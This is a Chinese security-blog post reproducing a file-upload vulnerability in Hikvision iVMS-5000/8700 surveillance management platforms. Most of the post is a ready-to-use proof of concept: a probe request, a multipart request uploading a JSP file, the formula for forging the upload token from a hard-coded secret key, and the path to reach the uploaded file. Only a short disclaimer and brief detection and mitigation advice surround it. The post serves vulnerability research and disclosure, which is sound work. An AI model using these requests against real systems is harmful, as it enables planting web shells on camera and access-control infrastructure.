海康iVMS综合安防存在文件上传漏洞

admin

102523
文章

87
评论

2024年3月15日09:47:32评论62 views字数 2023阅读6分44秒阅读模式

点击上方蓝字

关注我们

免责声明

海康iVMS综合安防存在文件上传漏洞

本文仅用于参考和学习交流，对于使用本文所提供的信息所造成的任何直接或间接的后果和损失，使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢！

海康iVMS综合安防存在文件上传漏洞

前言

海康iVMS综合安防存在文件上传漏洞

综合安防系统是一款功能强大的综合性管理平台，其特点是视频监控与门禁一卡通的深度融合，海康的系统在系统中大量存在，出于学习的目的，通过授权测试对象对该漏洞进行研究和复现。

海康iVMS综合安防存在文件上传漏洞

正文

海康iVMS综合安防存在文件上传漏洞

影响版本

海康iVMS综合安防存在文件上传漏洞

海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700

海康iVMS综合安防存在文件上传漏洞

漏洞探测

海康iVMS综合安防存在文件上传漏洞

POST /eps/api/resourceOperations/upload HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://ip:portConnection: closeCookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9Upgrade-Insecure-Requests: 1Content-Length: 62service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action

海康iVMS综合安防存在文件上传漏洞

漏洞验证

海康iVMS综合安防存在文件上传漏洞

POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPoUpgrade-Insecure-Requests: 1Content-Length: 174------WebKitFormBoundaryGEJwiloiPoContent-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpegtest------WebKitFormBoundaryGEJwiloiPo

其中token的值为

MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值

海康iVMS综合安防存在文件上传漏洞

访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp

海康iVMS综合安防存在文件上传漏洞

漏洞自查与修复

海康iVMS综合安防存在文件上传漏洞

自查方式：通过发送前文提到的漏洞探测数据包，观察返回的状态码为200，并且提示token empty!字样则可能存在漏洞，需要及时排查修复。

修复建议：关闭互联网暴露面访问的权限，文件上传模块做好权限强认证。

参考链接：

https://blog.csdn.net/qq_50854662/article/details/131481634

后记

海康iVMS综合安防存在文件上传漏洞

🌟 诚邀您点赞！点亮我们共同的故事，为我们的公众号加油！🔥🔥🔥

亲爱的读者，您的一个赞，对我们来说是无比的鼓励和动力。每一次点赞，都是您对我们内容的认可和支持，也是我们持续创作的动力源泉。

在点赞的同时，也请您分享我们的内容给更多的朋友，让更多的人了解我们的公众号，一起分享知识和快乐。您的支持，是我们前行的最大动力！🚀🚀🚀

让我们一起，为知识点赞，为生活点赞，为梦想点赞！🌟🌟🌟

海康iVMS综合安防存在文件上传漏洞

扫码关注

玄知安全实验室

海康iVMS综合安防存在文件上传漏洞

原文始发于微信公众号（玄知安全实验室）：海康iVMS综合安防存在文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

海康iVMS综合安防存在文件上传漏洞

某单位网址未授权导致发生的视频信息泄露

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

发表评论

在线咨询

微信